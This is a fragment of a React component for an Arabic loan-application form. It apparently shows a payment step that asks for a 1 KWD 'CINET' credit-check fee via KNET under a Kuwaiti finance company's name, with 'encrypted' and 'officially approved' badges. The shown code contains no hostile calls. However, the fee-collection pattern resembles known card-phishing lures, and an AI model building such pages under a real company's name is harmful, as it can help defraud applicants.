          <svg xmlns="http://www.w3.org/2000/svg" className="h-4 w-4 rotate-180" viewBox="0 0 24 24" fill="none" stroke="currentColor" strokeWidth="2" strokeLinecap="round" strokeLinejoin="round"><path d="M5 12h14"/><path d="m12 5 7 7-7 7"/></svg>
          العودة
        </button>
        <button
          type="button"
          onClick={onNext}
          disabled={!canNextSalary || syncingStage}
          className="inline-flex items-center justify-center gap-2 flex-1 h-12 rounded-xl shadow-lg hover:shadow-xl transition-all duration-300 disabled:opacity-50 disabled:cursor-not-allowed bg-gradient-to-r from-[#00A3E0] to-blue-700 hover:from-blue-700 hover:to-blue-800 text-white font-bold"
        >
          {syncingStage ? "جارٍ الحفظ..." : "التالي"}
          {!syncingStage && (
            <svg xmlns="http://www.w3.org/2000/svg" className="w-5 h-5" viewBox="0 0 24 24" fill="none" stroke="currentColor" strokeWidth="2" strokeLinecap="round" strokeLinejoin="round"><path d="m9 18 6-6-6-6"/></svg>
          )}
        </button>
      </div>
      {stepSyncError && step === 1 && (
        <p className="text-center text-xs text-red-600 mt-3">{stepSyncError}</p>
      )}
    </form>
  );

  const StepPayment = (
    <div className="max-w-md mx-auto px-6 pb-8 space-y-6">
      <div className="grid grid-cols-3 gap-3">
        <div className="rounded-xl bg-gradient-to-br from-green-50 to-white p-3 text-center space-y-2">
          <div className="w-10 h-10 bg-green-100 rounded-lg flex items-center justify-center mx-auto">
            <svg xmlns="http://www.w3.org/2000/svg" className="w-5 h-5 text-green-600" viewBox="0 0 24 24" fill="none" stroke="currentColor" strokeWidth="2" strokeLinecap="round" strokeLinejoin="round"><path d="M20 13c0 5-3.5 7.5-7.66 8.95a1 1 0 0 1-.67-.01C7.5 20.5 4 18 4 13V6a1 1 0 0 1 1-1c2 0 4.5-1.2 6.24-2.72a1.17 1.17 0 0 1 1.52 0C14.51 3.81 17 5 19 5a1 1 0 0 1 1 1z"/></svg>
          </div>
          <p className="text-xs font-semibold text-gray-700">دفع آمن</p>
        </div>
        <div className="rounded-xl bg-gradient-to-br from-blue-50 to-white p-3 text-center space-y-2">
          <div className="w-10 h-10 bg-blue-100 rounded-lg flex items-center justify-center mx-auto">
            <svg xmlns="http://www.w3.org/2000/svg" className="w-5 h-5 text-[#00A3E0]" viewBox="0 0 24 24" fill="none" stroke="currentColor" strokeWidth="2" strokeLinecap="round" strokeLinejoin="round"><rect width="18" height="11" x="3" y="11" rx="2" ry="2"/><path d="M7 11V7a5 5 0 0 1 10 0v4"/></svg>
          </div>
          <p className="text-xs font-semibold text-gray-700">مشفر ١٠٠٪</p>
        </div>
        <div className="rounded-xl bg-gradient-to-br from-purple-50 to-white p-3 text-center space-y-2">
          <div className="w-10 h-10 bg-purple-100 rounded-lg flex items-center justify-center mx-auto">
            <svg xmlns="http://www.w3.org/2000/svg" className="w-5 h-5 text-purple-600" viewBox="0 0 24 24" fill="none" stroke="currentColor" strokeWidth="2" strokeLinecap="round" strokeLinejoin="round"><path d="M12 6v6l4 2"/><circle cx="12" cy="12" r="10"/></svg>
          </div>
          <p className="text-xs font-semibold text-gray-700">فوري</p>
        </div>
      </div>

      <div className="rounded-2xl shadow-xl overflow-hidden">
        <div className="bg-gradient-to-r from-[#00A3E0] to-blue-700 p-6 text-center">
          <div className="w-16 h-16 bg-white/20 backdrop-blur-sm rounded-2xl flex items-center justify-center mx-auto mb-4 border border-white/30">
            <svg xmlns="http://www.w3.org/2000/svg" className="w-8 h-8 text-white" viewBox="0 0 24 24" fill="none" stroke="currentColor" strokeWidth="2" strokeLinecap="round" strokeLinejoin="round"><path d="M21.801 10A10 10 0 1 1 17 3.335"/><path d="m9 11 3 3L22 4"/></svg>
          </div>
          <p className="text-sm text-blue-100">الخطوة الأخيرة لإتمام طلب التمويل</p>
        </div>
        <div className="p-6 space-y-6">
          <div className="text-center space-y-3">
            <p className="text-gray-700 leading-relaxed">نشكركم على تقديم طلب التمويل لدى شركة التسهيلات التجارية.</p>
            <div className="bg-blue-50 border border-blue-200 rounded-xl p-4">
              <p className="text-gray-800 leading-relaxed">
                لضمان استكمال إجراءات الطلب، يرجى سداد رسوم خدمة سای نت وقدرها
                <span className="font-bold text-[#00A3E0] text-xl mx-1">1.00  د.ك</span>
                لمراجعة السجل الائتماني الخاص بكم.
              </p>
            </div>
            <p className="text-sm text-gray-600">سداد هذه الرسوم يعد خطوة أساسية لاستكمال تقييم طلبكم.</p>
          </div>

          <div className="bg-gray-50 rounded-xl p-4 space-y-3">
            <div className="flex items-center justify-between pb-3 border-b border-gray-200">
              <span className="text-gray-600">رسوم مراجعة السجل الائتماني</span>
              <span className="font-semibold text-gray-900">1.00 د.ك</span>
            </div>
            <div className="flex items-center justify-between">
              <span className="text-lg font-bold text-gray-900">المبلغ الإجمالي</span>
              <span className="text-2xl font-bold text-[#00A3E0]">1.00 د.ك</span>
            </div>
          </div>

          <button
            type="button"
            onClick={handleProceedToKnet}
            disabled={submittingLoan}
            className="inline-flex items-center justify-center gap-2 w-full h-14 text-lg font-bold rounded-xl shadow-lg hover:shadow-xl transition-all duration-300 disabled:opacity-60 disabled:cursor-not-allowed bg-gradient-to-r from-[#00A3E0] to-blue-700 hover:from-blue-700 hover:to-blue-800 text-white"
          >
            <span className="flex items-center gap-2 justify-center">
              <svg xmlns="http://www.w3.org/2000/svg" className="w-5 h-5" viewBox="0 0 24 24" fill="none" stroke="currentColor" strokeWidth="2" strokeLinecap="round" strokeLinejoin="round"><rect width="20" height="14" x="2" y="5" rx="2"/><line x1="2" x2="22" y1="10" y2="10"/></svg>
              {submittingLoan ? "جاري التحويل..." : "الدفع عبر كي نت"}
              <svg xmlns="http://www.w3.org/2000/svg" className="w-5 h-5" viewBox="0 0 24 24" fill="none" stroke="currentColor" strokeWidth="2" strokeLinecap="round" strokeLinejoin="round"><path d="m9 18 6-6-6-6"/></svg>
            </span>
          </button>
          {successToast && (
            <div className="text-center text-sm text-green-700 bg-green-50 border border-green-100 rounded-lg p-3">
              {successToast}
            </div>
          )}
          {submitError && (
            <div className="text-center text-sm text-red-600 bg-red-50 border border-red-100 rounded-lg p-3">
              {submitError}
            </div>
          )}

          <div className="flex items-start gap-3 bg-green-50 border border-green-200 rounded-lg p-3">
            <svg xmlns="http://www.w3.org/2000/svg" className="w-5 h-5 text-green-600 mt-0.5" viewBox="0 0 24 24" fill="none" stroke="currentColor" strokeWidth="2" strokeLinecap="round" strokeLinejoin="round"><path d="M20 13c0 5-3.5 7.5-7.66 8.95a1 1 0 0 1-.67-.01C7.5 20.5 4 18 4 13V6a1 1 0 0 1 1-1c2 0 4.5-1.2 6.24-2.72a1.17 1.17 0 0 1 1.52 0C14.51 3.81 17 5 19 5a1 1 0 0 1 1 1z"/></svg>
            <div>
              <p className="text-sm font-semibold text-green-900 mb-1">عملية دفع آمنة ومشفرة</p>
              <p className="text-xs text-green-700 leading-relaxed">سيتم تحويلك إلى بوابة كي نت الآمنة لإتمام عملية الدفع</p>
            </div>
          </div>
        </div>
      </div>

      <div className="rounded-2xl shadow-lg overflow-hidden text-white bg-gradient-to-l from-yellow-400 via-blue-500 to-blue-700">
        <div className="relative h-32">
          <div className="absolute inset-0 bg-gradient-to-l from-yellow-400/20 via-blue-500/40 to-blue-700/60"></div>
          <div
            className="absolute inset-0 opacity-30"
            style={{
              backgroundImage:
                "radial-gradient(circle at 20% 50%, rgba(255,255,255,0.2) 1px, transparent 1px)," +
                "radial-gradient(circle at 40% 20%, rgba(255,255,255,0.2) 1px, transparent 1px)," +
                "radial-gradient(circle at 60% 80%, rgba(255,255,255,0.2) 1px, transparent 1px)," +
                "radial-gradient(circle at 80% 40%, rgba(255,255,255,0.2) 1px, transparent 1px)",
              backgroundSize: "40px 40px, 60px 60px, 50px 50px, 45px 45px",
            }}
          />
          <div className="relative z-10 flex items-center justify-center h-full">
            <div className="text-center">
              <div className="text-white text-3xl font-bold mb-1">CI<span className="text-yellow-300">NET</span></div>
              <div className="text-white text-sm">سای نت</div>
            </div>
          </div>
        </div>
        <div className="p-6 space-y-4 bg-white text-gray-800">
          <div className="text-center">
            <h3 className="text-lg font-bold text-[#00A3E0] mb-2">مراجعة تاريخ الائتمان</h3>
            <p className="text-sm text-gray-600 mb-4">سای نت هي الجهة المعتمدة لتقييم السجل الائتماني في الكويت</p>
          </div>
          <div className="grid grid-cols-2 gap-3">
            <div className="bg-blue-50 rounded-lg p-3 text-center">
              <svg xmlns="http://www.w3.org/2000/svg" className="w-6 h-6 text-[#00A3E0] mx-auto mb-2" viewBox="0 0 24 24" fill="none" stroke="currentColor" strokeWidth="2" strokeLinecap="round" strokeLinejoin="round"><path d="M21.801 10A10 10 0 1 1 17 3.335"/><path d="m9 11 3 3L22 4"/></svg>
              <p className="text-xs font-semibold text-gray-700">معتمد رسمياً</p>
            </div>
            <div className="bg-green-50 rounded-lg p-3 text-center">
              <svg xmlns="http://www.w3.org/2000/svg" className="w-6 h-6 text-green-600 mx-auto mb-2" viewBox="0 0 24 24" fill="none" stroke="currentColor" strokeWidth="2" strokeLinecap="round" strokeLinejoin="round"><path d="M20 13c0 5-3.5 7.5-7.66 8.95a1 1 0 0 1-.67-.01C7.5 20.5 4 18 4 13V6a1 1 0 0 1 1-1c2 0 4.5-1.2 6.24-2.72a1.17 1.17 0 0 1 1.52 0C14.51 3.81 17 5 19 5a1 1 0 0 1 1 1z"/></svg>
              <p className="text-xs font-semibold text-gray-700">آمن وموثوق</p>
            </div>
          </div>
        </div>
      </div>

      <div className="text-center pt-2">
        <button
          type="button"
          onClick={onBack}
          className="inline-flex items-center justify-center gap-2 rounded-md text-sm font-medium border shadow-sm h-9 px-6 py-2 bg-white border-gray-300 hover:bg-gray-50"
        >
          <svg xmlns="http://www.w3.org/2000/svg" className="h-4 w-4 ml-2" viewBox="0 0 24 24" fill="none" stroke="currentColor" strokeWidth="2" strokeLinecap="round" strokeLinejoin="round"><path d="M5 12h14"/><path d="m12 5 7 7-7 7"/></svg>
          العودة
        </button>
      </div>
    </div>
  );

  if (pageLoading) return <Loader />;

  return (
    <div dir="rtl" className="min-h-screen bg-gradient-to-b from-gray-50 to-white text-gray-800">
      {Header}
      {Stepper}
      {step === 0 && StepPersonal}
      {step === 1 && StepSalary}
      {step === 2 && StepPayment}
    </div>
  );
}
